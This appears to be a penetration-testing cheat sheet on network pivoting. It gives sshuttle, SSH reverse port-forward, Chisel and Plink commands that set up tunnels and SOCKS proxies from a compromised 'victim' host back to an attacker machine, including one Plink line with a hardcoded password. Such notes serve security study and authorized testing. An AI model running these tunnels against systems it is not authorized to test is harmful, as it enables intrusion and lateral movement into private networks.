Network Pivoting

sshuttle

SSH required on machine.

sshuttle -r linux-user@10.200.124.33 10.200.124.30/24

SSH Tunnel

Remote Port Forward

  • Connects specific ports on local host to remote host

ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 kali@10.11.0.4

  • This connects local kali ports 1122, 13306 to remote ports 22, 3306. .11 is remote host, .4 is kali

Automatically Accept Host Key (For Connecting Back to Kali)

-o "UserKnownHostsFile=/dev/null"

Don't prompt for Host Key

-o "StrictHostKeyChecking=no" 
ssh -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" kali@10.11.0.4

Creating SSH Keys & Rules

mkdir keys
cd keys
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /tmp/keys/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /tmp/keys/id_rsa.
Your public key has been saved in /tmp/keys/id_rsa.pub.
...
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla

Rules for Use on Pivot Point

from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla

Chisel

https://github.com/jpillora/chisel

  • Binaries must exist on attacker AND victim (proxy) machine to work

  • Proxychains conf must be configured to “socks5 127.0.0.1 PORT(1080?)” as Chisel uses socks5

Reverse SOCKS Proxy

#Attacking Box (Listener)

./chisel server -p LISTEN_PORT --reverse &

#Victim

./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Forward SOCKS Proxy

#Victim

./chisel server -p LISTEN_PORT --socks5

#Attacking Box

./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

Remote Port Forward

#Attacking Machine

./chisel server -p LISTEN_PORT --reverse &

#Victim Machine

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Local Port Forward

#Victim Machine

./chisel server -p LISTEN_PORT

#Attacking Machine

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT

Plink

plink.exe -N -L 0.0.0.0:4444:192.168.119.212:1337 root@KaliIP
plink.exe -ssh -l root -pw toor -R 192.168.119.212:4444
Previous403 Forbidden BypassNextTools

Last updated